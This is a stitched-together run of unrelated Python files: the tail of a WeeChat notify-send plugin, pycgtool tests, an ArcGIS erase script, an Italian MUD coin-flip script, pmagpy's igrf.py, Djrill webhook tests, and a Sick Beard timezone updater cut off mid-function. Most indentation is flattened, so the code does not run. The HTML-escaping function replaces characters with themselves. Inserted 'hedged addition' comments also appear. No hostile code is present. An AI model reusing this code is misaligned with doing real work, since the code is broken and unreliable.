weechat.buffer_set(buffer, property, str(value))
def names_for_buffer(buffer):
"""Returns a list of all names for the given buffer."""
# The 'buffer' parameter passed to our callback is actually the buffer's ID
# (e.g. '0x2719cf0'). We have to check its name (e.g. 'freenode.#weechat')
# and short name (e.g. '#weechat') because these are what users specify in
# their configs.
buffer_names = []
full_name = weechat.buffer_get_string(buffer, 'name')
if full_name:
buffer_names.append(full_name)
short_name = weechat.buffer_get_string(buffer, 'short_name')
if short_name:
buffer_names.append(short_name)
# Consider >channel and #channel to be equal buffer names. The reason
# is that the https://github.com/rawdigits/wee-slack script replaces
# '#' with '>' to indicate that someone in the buffer is typing. This
# fixes the behavior of several configuration options (e.g.
# 'notify_on_all_messages_in_buffers') when weechat_notify_send is used
# together with the wee_slack script.
#
    # Note that this only needs to be done for the short name; the full
    # name always stays unchanged.
if short_name.startswith('>'):
buffer_names.append('#' + short_name[1:])
return buffer_names
def notify_for_current_buffer():
"""Should we also send notifications for the current buffer?"""
return weechat.config_get_plugin('notify_for_current_buffer') == 'on'
def notify_on_highlights():
"""Should we send notifications on highlights?"""
return weechat.config_get_plugin('notify_on_highlights') == 'on'
def notify_on_private_messages():
"""Should we send notifications on private messages?"""
return weechat.config_get_plugin('notify_on_privmsgs') == 'on'
def notify_on_filtered_messages():
"""Should we also send notifications for filtered (hidden) messages?"""
return weechat.config_get_plugin('notify_on_filtered_messages') == 'on'
def notify_when_away():
"""Should we also send notifications when away?"""
return weechat.config_get_plugin('notify_when_away') == 'on'
def is_away(buffer):
"""Is the user away?"""
return weechat.buffer_get_string(buffer, 'localvar_away') != ''
def is_private_message(buffer):
"""Has a private message been sent?"""
return weechat.buffer_get_string(buffer, 'localvar_type') == 'private'
def i_am_author_of_message(buffer, nick):
"""Am I (the current WeeChat user) the author of the message?"""
return weechat.buffer_get_string(buffer, 'localvar_nick') == nick
def split_option_value(option, separator=','):
"""Splits the value of the given plugin option by the given separator and
returns the result in a list.
"""
values = weechat.config_get_plugin(option)
if not values:
# When there are no values, return the empty list instead of [''].
return []
return [value.strip() for value in values.split(separator)]
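# Illustrative examples for split_option_value() (a hedged addition, not part of the
# original script), assuming the plugin option holds the shown raw string:
#
#     ''                      -> []
#     '#weechat, #python'     -> ['#weechat', '#python']
#     'irc_join,irc_part'     -> ['irc_join', 'irc_part']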
def ignore_notifications_from_messages_tagged_with(tags):
"""Should notifications be ignored for a message tagged with the given
tags?
"""
ignored_tags = split_option_value('ignore_messages_tagged_with')
for ignored_tag in ignored_tags:
for tag in tags:
if tag == ignored_tag:
return True
return False
def ignore_notifications_from_buffer(buffer):
"""Should notifications from the given buffer be ignored?"""
buffer_names = names_for_buffer(buffer)
for buffer_name in buffer_names:
if buffer_name and buffer_name in ignored_buffers():
return True
for buffer_name in buffer_names:
for prefix in ignored_buffer_prefixes():
if prefix and buffer_name.startswith(prefix):
return True
return False
def ignored_buffers():
"""A generator of buffers from which notifications should be ignored."""
for buffer in split_option_value('ignore_buffers'):
yield buffer
def ignored_buffer_prefixes():
"""A generator of buffer prefixes from which notifications should be
ignored.
"""
for prefix in split_option_value('ignore_buffers_starting_with'):
yield prefix
def ignore_notifications_from_nick(nick):
"""Should notifications from the given nick be ignored?"""
if nick in ignored_nicks():
return True
for prefix in ignored_nick_prefixes():
if prefix and nick.startswith(prefix):
return True
return False
def ignored_nicks():
"""A generator of nicks from which notifications should be ignored."""
for nick in split_option_value('ignore_nicks'):
yield nick
def ignored_nick_prefixes():
"""A generator of nick prefixes from which notifications should be
ignored.
"""
for prefix in split_option_value('ignore_nicks_starting_with'):
yield prefix
def notify_on_messages_that_match(message):
"""Should we send a notification for the given message, provided it matches
any of the requested patterns?
"""
message_patterns = split_option_value('notify_on_messages_that_match')
for pattern in message_patterns:
if re.search(pattern, message):
return True
return False
def buffers_to_notify_on_all_messages():
"""A generator of buffer names in which the user wants to be notified for
all messages.
"""
for buffer in split_option_value('notify_on_all_messages_in_buffers'):
yield buffer
def buffer_patterns_to_notify_on_all_messages():
"""A generator of buffer-name patterns in which the user wants to be
    notified for all messages.
"""
for pattern in split_option_value('notify_on_all_messages_in_buffers_that_match'):
yield pattern
def notify_on_all_messages_in_buffer(buffer):
"""Does the user want to be notified for all messages in the given buffer?
"""
buffer_names = names_for_buffer(buffer)
# Option notify_on_all_messages_in_buffers:
for buf in buffers_to_notify_on_all_messages():
if buf in buffer_names:
return True
# Option notify_on_all_messages_in_buffers_that_match:
for pattern in buffer_patterns_to_notify_on_all_messages():
for buf in buffer_names:
if re.search(pattern, buf):
return True
return False
def buffer_patterns_to_hide_messages():
"""A generator of buffer-name patterns in which the user wants to hide
messages.
"""
for pattern in split_option_value('hide_messages_in_buffers_that_match'):
yield pattern
def hide_message_in_buffer(buffer):
"""Should we hide messages in the given buffer?"""
buffer_names = names_for_buffer(buffer)
for pattern in buffer_patterns_to_hide_messages():
for buf in buffer_names:
if re.search(pattern, buf):
return True
return False
def prepare_notification(buffer, nick, message):
"""Prepares a notification from the given data."""
if is_private_message(buffer):
source = nick
else:
source = (weechat.buffer_get_string(buffer, 'short_name') or
weechat.buffer_get_string(buffer, 'name'))
message = nick + nick_separator() + message
if hide_message_in_buffer(buffer):
message = ''
max_length = int(weechat.config_get_plugin('max_length'))
if max_length > 0:
ellipsis = weechat.config_get_plugin('ellipsis')
message = shorten_message(message, max_length, ellipsis)
if weechat.config_get_plugin('escape_html') == 'on':
message = escape_html(message)
message = escape_slashes(message)
icon = weechat.config_get_plugin('icon')
desktop_entry = weechat.config_get_plugin('desktop_entry')
timeout = weechat.config_get_plugin('timeout')
transient = should_notifications_be_transient()
urgency = weechat.config_get_plugin('urgency')
return Notification(source, message, icon, desktop_entry, timeout, transient, urgency)
def should_notifications_be_transient():
"""Should the sent notifications be transient, i.e. should they be removed
from the notification bar once they expire or are dismissed?
"""
return weechat.config_get_plugin('transient') == 'on'
def nick_separator():
"""Returns a nick separator to be used."""
separator = weechat.config_get_plugin('nick_separator')
return separator if separator else default_value_of('nick_separator')
def shorten_message(message, max_length, ellipsis):
"""Shortens the message to at most max_length characters by using the given
ellipsis.
"""
# In Python 2, we need to decode the message and ellipsis into Unicode to
# correctly (1) detect their length and (2) shorten the message. Failing to
# do that could make the shortened message invalid and cause notify-send to
# fail. For example, when we have bytes, we cannot guarantee that we do not
# split the message inside of a multibyte character.
if sys.version_info.major == 2:
try:
message = message.decode('utf-8')
ellipsis = ellipsis.decode('utf-8')
except UnicodeDecodeError:
# Either (or both) of the two cannot be decoded. Continue in a
# best-effort manner.
pass
message = shorten_unicode_message(message, max_length, ellipsis)
if sys.version_info.major == 2:
if not isinstance(message, str):
message = message.encode('utf-8')
return message
def shorten_unicode_message(message, max_length, ellipsis):
"""An internal specialized version of shorten_message() when the both the
message and ellipsis are str (in Python 3) or unicode (in Python 2).
"""
if max_length <= 0 or len(message) <= max_length:
# Nothing to shorten.
return message
if len(ellipsis) >= max_length:
# We cannot include any part of the message.
return ellipsis[:max_length]
return message[:max_length - len(ellipsis)] + ellipsis
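# Worked examples for shorten_unicode_message() (a hedged addition, not part of the
# original script), following the branches above:
#
#     shorten_unicode_message('hi there!!!', 8, '[..]')  # -> 'hi t[..]'
#     shorten_unicode_message('short', 8, '[..]')        # -> 'short'  (nothing to shorten)
#     shorten_unicode_message('whatever', 3, '[..]')     # -> '[..'    (ellipsis itself truncated)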
def escape_html(message):
"""Escapes HTML characters in the given message."""
# Only the following characters need to be escaped
# (https://wiki.ubuntu.com/NotificationDevelopmentGuidelines).
message = message.replace('&', '&')
message = message.replace('<', '<')
message = message.replace('>', '>')
return message
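# Illustrative example for escape_html() (a hedged addition, not part of the original
# script); '&' is replaced first so the ampersands introduced by the '<' and '>'
# replacements are not escaped again:
#
#     escape_html('<b>a & b</b>')  # -> '&lt;b&gt;a &amp; b&lt;/b&gt;'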
def escape_slashes(message):
"""Escapes slashes in the given message."""
# We need to escape backslashes to prevent notify-send from interpreting
# them, e.g. we do not want to print a newline when the message contains
# '\n'.
return message.replace('\\', r'\\')
def send_notification(notification):
"""Sends the given notification to the user."""
notify_cmd = ['notify-send', '--app-name', 'weechat']
if notification.icon:
notify_cmd += ['--icon', notification.icon]
if notification.desktop_entry:
notify_cmd += ['--hint', 'string:desktop-entry:{}'.format(notification.desktop_entry)]
if notification.timeout:
notify_cmd += ['--expire-time', str(notification.timeout)]
if notification.transient:
notify_cmd += ['--hint', 'int:transient:1']
if notification.urgency:
notify_cmd += ['--urgency', notification.urgency]
# We need to add '--' before the source and message to ensure that
# notify-send considers the remaining parameters as the source and the
# message. This prevents errors when a source or message starts with '--'.
notify_cmd += [
'--',
# notify-send fails with "No summary specified." when no source is
# specified, so ensure that there is always a non-empty source.
notification.source or '-',
notification.message
]
# Prevent notify-send from messing up the WeeChat screen when occasionally
# emitting assertion messages by redirecting the output to /dev/null (users
# would need to run /redraw to fix the screen).
# In Python < 3.3, there is no subprocess.DEVNULL, so we have to use a
# workaround.
with open(os.devnull, 'wb') as devnull:
try:
subprocess.check_call(
notify_cmd,
stderr=subprocess.STDOUT,
stdout=devnull,
)
except Exception as ex:
error_message = '{} (reason: {!r}). {}'.format(
'Failed to send the notification via notify-send',
'{}: {}'.format(ex.__class__.__name__, ex),
'Ensure that you have notify-send installed in your system.',
)
print(error_message, file=sys.stderr)
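# Hedged illustration (not part of the original script): with the default options above,
# the command assembled by send_notification() looks roughly like
#
#     notify-send --app-name weechat \
#         --icon /usr/share/icons/hicolor/32x32/apps/weechat.png \
#         --hint string:desktop-entry:weechat --expire-time 5000 \
#         --hint int:transient:1 --urgency normal -- '#weechat' 'alice: hello'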
if __name__ == '__main__':
# Registration.
weechat.register(
SCRIPT_NAME,
SCRIPT_AUTHOR,
SCRIPT_VERSION,
SCRIPT_LICENSE,
SCRIPT_DESC,
SCRIPT_SHUTDOWN_FUNC,
SCRIPT_CHARSET
)
# Initialization.
for option, (default_value, description) in OPTIONS.items():
description = add_default_value_to(description, default_value)
weechat.config_set_desc_plugin(option, description)
if not weechat.config_is_set_plugin(option):
weechat.config_set_plugin(option, default_value)
# Catch all messages on all buffers and strip colors from them before
# passing them into the callback.
weechat.hook_print('', '', '', 1, 'message_printed_callback', '')
|
import unittest
import subprocess
import os
import logging
import numpy as np
from simpletraj.trajectory import XtcTrajectory
try:
import mdtraj
mdtraj_present = True
except ImportError:
mdtraj_present = False
from pycgtool.interface import Options
from pycgtool.util import cmp_whitespace_float
from pycgtool.pycgtool import main, map_only
class Args:
def __init__(self, name, map=True, bnd=True):
self.gro = os.path.join("test/data", name+".gro")
self.xtc = os.path.join("test/data", name+".xtc")
self.map = os.path.join("test/data", name+".map") if map else None
self.bnd = os.path.join("test/data", name+".bnd") if bnd else None
self.begin = 0
self.end = -1
self.quiet = True
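# Hedged note (added for illustration, not part of the original tests): Args("sugar")
# simply points the tool at the bundled fixtures, i.e. gro="test/data/sugar.gro",
# xtc="test/data/sugar.xtc", map="test/data/sugar.map", bnd="test/data/sugar.bnd",
# with begin=0, end=-1 and quiet output.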
class PycgtoolTest(unittest.TestCase):
config = Options([("output_name", "out"),
("output", "gro"),
("output_xtc", True),
("map_only", False),
("map_center", "geom"),
("constr_threshold", 100000),
("dump_measurements", False),
("dump_n_values", 10000),
("output_forcefield", False),
("temperature", 310),
("default_fc", False),
("generate_angles", True),
("generate_dihedrals", False)])
def test_run_help(self):
path = os.path.dirname(os.path.dirname(__file__))
self.assertEqual(0, subprocess.check_call([os.path.join(path, "pycgtool.py"), "-h"], stdout=subprocess.PIPE))
@unittest.skipIf(not mdtraj_present, "MDTRAJ or Scipy not present")
def test_map_only(self):
logging.disable(logging.WARNING)
map_only(Args("sugar"), self.config)
logging.disable(logging.NOTSET)
xtc = XtcTrajectory("out.xtc")
xtc_ref = XtcTrajectory("test/data/sugar_out.xtc")
self.assertEqual(xtc_ref.numframes, xtc.numframes)
for i in range(xtc_ref.numframes):
xtc.get_frame(i)
xtc_ref.get_frame(i)
np.testing.assert_array_almost_equal(xtc_ref.box, xtc.box, decimal=3)
np.testing.assert_array_almost_equal(xtc_ref.x, xtc.x, decimal=3)
def test_full(self):
path = os.path.dirname(os.path.dirname(__file__))
self.assertEqual(0, subprocess.check_call([os.path.join(path, "pycgtool.py"),
"-g", "test/data/sugar.gro",
"-x", "test/data/sugar.xtc",
"-m", "test/data/sugar_only.map",
"-b", "test/data/sugar.bnd",
], stdout=subprocess.PIPE, stderr=subprocess.PIPE))
self.assertTrue(cmp_whitespace_float("out.itp", "test/data/sugar_out.itp", float_rel_error=0.001))
self.assertTrue(cmp_whitespace_float("out.gro", "test/data/sugar_out.gro", float_rel_error=0.001))
# TODO more tests
if __name__ == '__main__':
unittest.main()
|
import os, sys, math, traceback
import arcpy
DEBUG = False
deleteme = []
arcpy.env.overwriteOutput = True
if DEBUG == True:
arcpy.AddMessage("Using scratch GDB of: " + arcpy.env.scratchWorkspace)
# Read in the Parameters
baseFeatureClass = arcpy.GetParameterAsText(0)
obstructionFeatureClasses = arcpy.GetParameterAsText(1)
templateFeatureClass = arcpy.GetParameterAsText(2)
eraseOutputFeatureClass = os.path.join(arcpy.env.scratchWorkspace, "temperase")
unionedFeatureClass = os.path.join(arcpy.env.scratchWorkspace, "tempunion")
splitObstructionFeatureClasses = obstructionFeatureClasses.split(";")
numFC = len(splitObstructionFeatureClasses)
# Union together the obstructions and then erase them
if obstructionFeatureClasses != "" and numFC > 0:
arcpy.AddMessage( str(numFC) + " feature class(es) provided")
# create a value table
vtab = arcpy.ValueTable(2)
vtab.loadFromString(obstructionFeatureClasses)
# union
arcpy.AddMessage("unionedFeatureClass: " + unionedFeatureClass)
arcpy.Union_analysis(vtab, unionedFeatureClass)
deleteme.append(unionedFeatureClass)
deleteme.append(eraseOutputFeatureClass)
# Erase
arcpy.Erase_analysis(baseFeatureClass, unionedFeatureClass, eraseOutputFeatureClass)
arcpy.CopyFeatures_management(eraseOutputFeatureClass, templateFeatureClass)
if DEBUG == True:
arcpy.AddMessage("Features copied from union to template")
else:
if DEBUG == True:
arcpy.AddMessage("No obstructions, returning base feature class.")
arcpy.CopyFeatures_management(baseFeatureClass, templateFeatureClass)
if DEBUG == True:
arcpy.AddMessage("Features copied from base to template.")
for i in deleteme:
if DEBUG == True:
arcpy.AddMessage("Removing: " + str(i))
arcpy.Delete_management(i)
arcpy.SetParameter(3,"true")
|
# -*- coding: utf-8 -*-
#= IMPORT ======================================================================
import random
from src.log import log
from src.enums import TO
#= FUNCTIONS ===================================================================
def after_drop(entity, coin, room, behavioured):
if not entity:
log.bug("entity non è un parametro valido: %r" % entity)
return
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
if not room:
log.bug("room non è un parametro valido: %r" % room)
return
heads_or_tails(coin)
entity.act("Fai volteggiare $N fino a terra", TO.ENTITY, coin)
entity.act("$n fa voteggiare te povero $N", TO.TARGET, coin)
entity.act("$n fa volteggiare $N fino a terra", TO.OTHERS, coin)
coin = coin.from_location(1)
coin = coin.to_location(room, 1)
return True
#- End of Function -
def after_inject(coin, room):
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
coin.long = "$N è caduta in piedi!"
#- Fine Funzione -
def after_reset(coin):
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
coin.long = "$N è caduta in piedi!"
#- Fine Funzione -
def heads_or_tails(coin):
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
number = random.randint(0, 200)
    if number == 0:
        coin.long = "$N has landed on its edge!"
    elif number % 2 == 0:
        coin.long = "$N has landed heads up."
    else:
        coin.long = "$N has landed tails up."
#- End of Function -
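# Hedged note on the odds (added for illustration, not part of the original script):
# random.randint(0, 200) yields 201 equally likely values, so the coin lands on its
# edge with probability 1/201, shows heads for the 100 non-zero even values and
# tails for the 100 odd values.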
|
#!/usr/bin/env python
from __future__ import print_function
from builtins import input
import sys
import matplotlib
if matplotlib.get_backend() != "TKAgg":
matplotlib.use("TKAgg")
import numpy
import pmagpy.pmag as pmag
#
def main():
"""
NAME
igrf.py
DESCRIPTION
This program calculates igrf field values
using the routine of Malin and Barraclough (1981)
based on d/igrfs from 1900 to 2010.
        Between 1900 and 1000 BCE, it uses CALS3K.4 or ARCH3K.1.
        Prior to 1000 BCE, it uses PFM9k or CALS10k-4b.
Calculates reference field vector at specified location and time.
SYNTAX
igrf.py [-h] [-i] -f FILE [< filename]
OPTIONS:
-h prints help message and quits
-i for interactive data entry
-f FILE specify file name with input data
-F FILE specify output file name
-ages MIN MAX INCR: specify age minimum in years (+/- AD), maximum and increment, default is line by line
-loc LAT LON; specify location, default is line by line
-alt ALT; specify altitude in km, default is sealevel (0)
-plt; make a plot of the time series
-sav, saves plot and quits
-fmt [pdf,jpg,eps,svg] specify format for output figure (default is svg)
-mod [arch3k,cals3k,pfm9k,hfm10k,cals10k_2,shadif14k,cals10k] specify model for 3ka to 1900 AD, default is cals10k
NB: program uses IGRF12 for dates 1900 to 2015.
INPUT FORMAT
interactive entry:
date: decimal year
alt: altitude in km
lat: positive north
lon: positive east
for file entry:
space delimited string: date alt lat long
OUTPUT FORMAT
Declination Inclination Intensity (nT) date alt lat long
    MODELS: ARCH3K (Korte et al., 2009); CALS3K (Korte & Constable, 2011); CALS10k (is .1b of Korte et al., 2011); PFM9K (Nilsson et al., 2014); HFM10k (is HFM.OL1.A1 of Constable et al., 2016); CALS10k_2 (is cals10k.2 of Constable et al., 2016); SHADIF14k (SHA.DIF.14K of Pavon-Carrasco et al., 2014).
"""
plot,fmt=0,'svg'
plt=0
if '-fmt' in sys.argv:
ind=sys.argv.index('-fmt')
fmt=sys.argv[ind+1]
    if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
if '-mod' in sys.argv:
ind=sys.argv.index('-mod')
mod=sys.argv[ind+1]
else: mod='cals10k'
if '-f' in sys.argv:
ind=sys.argv.index('-f')
file=sys.argv[ind+1]
        # Read the whole file as data; avoid rebinding the builtin input(),
        # which is still needed by the interactive save prompt below.
        data=numpy.loadtxt(file)
elif '-i' in sys.argv:
while 1:
try:
line=[]
line.append(float(input("Decimal year: <cntrl-D to quit> ")))
alt=input("Elevation in km [0] ")
if alt=="":alt="0"
line.append(float(alt))
line.append(float(input("Latitude (positive north) ")))
line.append(float(input("Longitude (positive east) ")))
if mod=='':
x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0])
else:
x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0],mod=mod)
Dir=pmag.cart2dir((x,y,z))
print('%8.2f %8.2f %8.0f'%(Dir[0],Dir[1],f))
except EOFError:
print("\n Good-bye\n")
sys.exit()
elif '-ages' in sys.argv:
ind=sys.argv.index('-ages')
agemin=float(sys.argv[ind+1])
agemax=float(sys.argv[ind+2])
ageincr=float(sys.argv[ind+3])
if '-loc' in sys.argv:
ind=sys.argv.index('-loc')
lat=float(sys.argv[ind+1])
lon=float(sys.argv[ind+2])
else:
print("must specify lat/lon if using age range option")
sys.exit()
if '-alt' in sys.argv:
ind=sys.argv.index('-alt')
alt=float(sys.argv[ind+1])
else: alt=0
ages=numpy.arange(agemin,agemax,ageincr)
lats=numpy.ones(len(ages))*lat
lons=numpy.ones(len(ages))*lon
alts=numpy.ones(len(ages))*alt
        data=numpy.array([ages,alts,lats,lons]).transpose()
else:
        data=numpy.loadtxt(sys.stdin,dtype=float)
if '-F' in sys.argv:
ind=sys.argv.index('-F')
outfile=sys.argv[ind+1]
out=open(outfile,'w')
else:outfile=""
if '-sav' in sys.argv:plot=1
if '-plt' in sys.argv:
plt=1
import matplotlib
matplotlib.use("TkAgg")
import pylab
pylab.ion()
Ages,Decs,Incs,Ints,VADMs=[],[],[],[],[]
    for line in data:
#if mod=='':
# x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0])
#else:
# x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0],mod=mod)
x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0],mod=mod)
Dir=pmag.cart2dir((x,y,z))
if outfile!="":
out.write('%8.2f %8.2f %8.0f %7.1f %7.1f %7.1f %7.1f\n'%(Dir[0],Dir[1],f,line[0],line[1],line[2],line[3]))
elif plt:
Ages.append(line[0])
if Dir[0]>180: Dir[0]=Dir[0]-360.0
Decs.append(Dir[0])
Incs.append(Dir[1])
Ints.append(f*1e-3)
VADMs.append(pmag.b_vdm(f*1e-9,line[2])*1e-21)
else:
print('%8.2f %8.2f %8.0f %7.1f %7.1f %7.1f %7.1f'%(Dir[0],Dir[1],f,line[0],line[1],line[2],line[3]))
if plt:
fig=pylab.figure(num=1,figsize=(7,9))
fig.add_subplot(411)
pylab.plot(Ages,Decs)
pylab.ylabel('Declination ($^{\circ}$)')
fig.add_subplot(412)
pylab.plot(Ages,Incs)
pylab.ylabel('Inclination ($^{\circ}$)')
fig.add_subplot(413)
pylab.plot(Ages,Ints)
pylab.ylabel('Intensity ($\mu$T)')
fig.add_subplot(414)
pylab.plot(Ages,VADMs)
pylab.ylabel('VADMs (ZAm$^2$)')
pylab.xlabel('Ages')
if plot==0:
pylab.draw()
ans=input("S[a]ve to save figure, <Return> to quit ")
if ans=='a':
pylab.savefig('igrf.'+fmt)
print('Figure saved as: ','igrf.'+fmt)
else:
pylab.savefig('igrf.'+fmt)
print('Figure saved as: ','igrf.'+fmt)
sys.exit()
if __name__ == "__main__":
main()
|
from base64 import b64encode
import hashlib
import hmac
import json
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from ..compat import b
from ..signals import webhook_event
from .utils import override_settings
class DjrillWebhookSecretMixinTests(TestCase):
"""
Test mixin used in optional Mandrill webhook support
"""
def test_missing_secret(self):
with self.assertRaises(ImproperlyConfigured):
self.client.get('/webhook/')
@override_settings(DJRILL_WEBHOOK_SECRET='abc123')
def test_incorrect_secret(self):
response = self.client.head('/webhook/?secret=wrong')
self.assertEqual(response.status_code, 403)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123')
def test_default_secret_name(self):
response = self.client.head('/webhook/?secret=abc123')
self.assertEqual(response.status_code, 200)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123', DJRILL_WEBHOOK_SECRET_NAME='verysecret')
def test_custom_secret_name(self):
response = self.client.head('/webhook/?verysecret=abc123')
self.assertEqual(response.status_code, 200)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123',
DJRILL_WEBHOOK_SIGNATURE_KEY="signature")
class DjrillWebhookSignatureMixinTests(TestCase):
"""
Test mixin used in optional Mandrill webhook signature support
"""
def test_incorrect_settings(self):
with self.assertRaises(ImproperlyConfigured):
self.client.post('/webhook/?secret=abc123')
@override_settings(DJRILL_WEBHOOK_URL="/webhook/?secret=abc123",
DJRILL_WEBHOOK_SIGNATURE_KEY = "anothersignature")
def test_unauthorized(self):
response = self.client.post(settings.DJRILL_WEBHOOK_URL)
self.assertEqual(response.status_code, 403)
@override_settings(DJRILL_WEBHOOK_URL="/webhook/?secret=abc123")
def test_signature(self):
signature = hmac.new(key=b(settings.DJRILL_WEBHOOK_SIGNATURE_KEY),
msg=b(settings.DJRILL_WEBHOOK_URL+"mandrill_events[]"),
digestmod=hashlib.sha1)
hash_string = b64encode(signature.digest())
response = self.client.post('/webhook/?secret=abc123', data={"mandrill_events":"[]"},
**{"HTTP_X_MANDRILL_SIGNATURE": hash_string})
self.assertEqual(response.status_code, 200)
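    # Hedged note (added for illustration, not part of the original tests): the test
    # above mirrors the signing scheme this view verifies -- the webhook URL
    # concatenated with each POST field name and value, HMAC-SHA1'd with the shared
    # key, base64-encoded and sent in the X-Mandrill-Signature header.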
@override_settings(DJRILL_WEBHOOK_SECRET='abc123')
class DjrillWebhookViewTests(TestCase):
"""
Test optional Mandrill webhook view
"""
def test_head_request(self):
response = self.client.head('/webhook/?secret=abc123')
self.assertEqual(response.status_code, 200)
def test_post_request_invalid_json(self):
response = self.client.post('/webhook/?secret=abc123')
self.assertEqual(response.status_code, 400)
def test_post_request_valid_json(self):
response = self.client.post('/webhook/?secret=abc123', {
'mandrill_events': json.dumps([{"event": "send", "msg": {}}])
})
self.assertEqual(response.status_code, 200)
def test_webhook_send_signal(self):
self.signal_received_count = 0
test_event = {"event": "send", "msg": {}}
def my_callback(sender, event_type, data, **kwargs):
self.signal_received_count += 1
self.assertEqual(event_type, 'send')
self.assertEqual(data, test_event)
webhook_event.connect(my_callback)
response = self.client.post('/webhook/?secret=abc123', {
'mandrill_events': json.dumps([test_event])
})
self.assertEqual(response.status_code, 200)
self.assertEqual(self.signal_received_count, 1)
|
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
from lib.dateutil import tz
import lib.dateutil.zoneinfo
from sickbeard import db
from sickbeard import helpers
from sickbeard import logger
from sickbeard import encodingKludge as ek
from os.path import basename, realpath, join, isfile
import os
import re
import datetime
# regex to parse time (12/24 hour format)
time_regex = re.compile(r"(\d{1,2}):(\d{2,2})( [PA]M)?\b", flags=re.IGNORECASE)
network_dict = None
sb_timezone = tz.tzlocal()
# helper to remove failed temp download
def _remove_zoneinfo_failed(filename):
try:
os.remove(filename)
except:
pass
# helper to remove old unneeded zoneinfo files
def _remove_old_zoneinfo():
if (lib.dateutil.zoneinfo.ZONEINFOFILE is not None):
cur_zoneinfo = ek.ek(basename, lib.dateutil.zoneinfo.ZONEINFOFILE)
else:
return
cur_file = ek.ek(realpath, u'lib/dateutil/zoneinfo/' + cur_zoneinfo)
for (path, dirs, files) in ek.ek(os.walk,ek.ek(realpath,u'lib/dateutil/zoneinfo/')):
for filename in files:
if filename.endswith('.tar.gz'):
file_w_path = ek.ek(join,path,filename)
if file_w_path != cur_file and ek.ek(isfile,file_w_path):
try:
os.remove(file_w_path)
logger.log(u"Delete unneeded old zoneinfo File: " + file_w_path)
except:
logger.log(u"Unable to delete: " + file_w_path,logger.ERROR)
# update the dateutil zoneinfo
def _update_zoneinfo():
global sb_timezone
sb_timezone = tz.tzlocal()
# now check if the zoneinfo needs update
url_zv = 'http://github.com/Prinz23/sb_network_timezones/raw/master/zoneinfo.txt'
url_data = helpers.getURL(url_zv)
if url_data is None:
# When urlData is None, trouble connecting to github
logger.log(u"Loading zoneinfo.txt failed. Unable to get URL: " + url_zv, logger.ERROR)
return
if (lib.dateutil.zoneinfo.ZONEINFOFILE is not None):
cur_zoneinfo = ek.ek(basename, lib.dateutil.zoneinfo.ZONEINFOFILE)
else:
cur_zoneinfo = None
(new_zoneinfo, zoneinfo_md5) = url_data.decode('utf-8').strip().rsplit(u' ')
if ((cur_zoneinfo is not None) and (new_zoneinfo == cur_zoneinfo)):
return
# now load the new zoneinfo
url_tar = u'http://github.com/Prinz23/sb_network_timezones/raw/master/' + new_zoneinfo
zonefile = ek.ek(realpath, u'lib/dateutil/zoneinfo/' + new_zoneinfo)
zonefile_tmp = re.sub(r"\.tar\.gz$",'.tmp', zonefile)
if (os.path.exists(zonefile_tmp)):
try:
os.remove(zonefile_tmp)
except:
logger.log(u"Unable to delete: " + zonefile_tmp,logger.ERROR)
return
if not helpers.download_file(url_tar, zonefile_tmp):
return
new_hash = str(helpers.md5_for_file(zonefile_tmp))
if (zoneinfo_md5.upper() == new_hash.upper()):
logger.log(u"Updating timezone info with new one: " + new_zoneinfo,logger.MESSAGE)
try:
# remove the old zoneinfo file
if (cur_zoneinfo is not None):
old_file = ek.ek(realpath, u'lib/dateutil/zoneinfo/' + cur_zoneinfo)
if (os.path.exists(old_file)):
os.remove(old_file)
# rename downloaded file
os.rename(zonefile_tmp,zonefile)
# load the new zoneinfo
reload(lib.dateutil.zoneinfo)
sb_timezone = tz.tzlocal()
except:
_remove_zoneinfo_failed(zonefile_tmp)
return
else:
_remove_zoneinfo_failed(zonefile_tmp)
logger.log(u"MD5 HASH doesn't match: " + zoneinfo_md5.upper() + ' File: ' + new_hash.upper(),logger.ERROR)
return
# update the network timezone table
def update_network_dict():
_remove_old_zoneinfo()
_update_zoneinfo()
d = {}
# network timezones are stored on github pages
url = 'http://github.com/Prinz23/sb_network_timezones/raw/master/network_timezones.txt'
url_data = helpers.getURL(url)
if url_data is None:
# When urlData is None, trouble connecting to github
logger.log(u"Loading Network Timezones update failed. Unable to get URL: " + url, logger.ERROR)
load_network_dict()
return
try:
for line in url_data.splitlines():
(key, val) = line.decode('utf-8').strip().rsplit(u':',1)
if key is None or val is None:
continue
d[key] = val
except (IOError, OSError):
pass
myDB = db.DBConnection("cache.db")
# load current network timezones
old_d = dict(myDB.select("SELECT * FROM network_timezones"))
# list of sql commands to update the network_timezones table
ql = []
for cur_d, cur_t in d.iteritems():
h_k = old_d.has_key(cur_d)
if h_k and cur_t != old_d[cur_d]:
# update old record
ql.append(["UPDATE network_timezones SET network_name=?, timezone=? WHERE network_name=?", [cur_d, cur_t, cur_d]])
elif not h_k:
# add new record
ql.append(["INSERT INTO network_timezones (network_name, timezone) VALUES (?,?)", [cur_d, cur_t]])
if h_k:
del old_d[cur_d]
# remove deleted records
if len(old_d) > 0:
L = list(va for va in old_d)
ql.append(["DELETE FROM network_timezones WHERE network_name IN ("+','.join(['?'] * len(L))+")", L])
# change all network timezone infos at once (much faster)
myDB.mass_action(ql)
load_network_dict()
# load network timezones from db into dict
def load_network_dict():
d = {}
try:
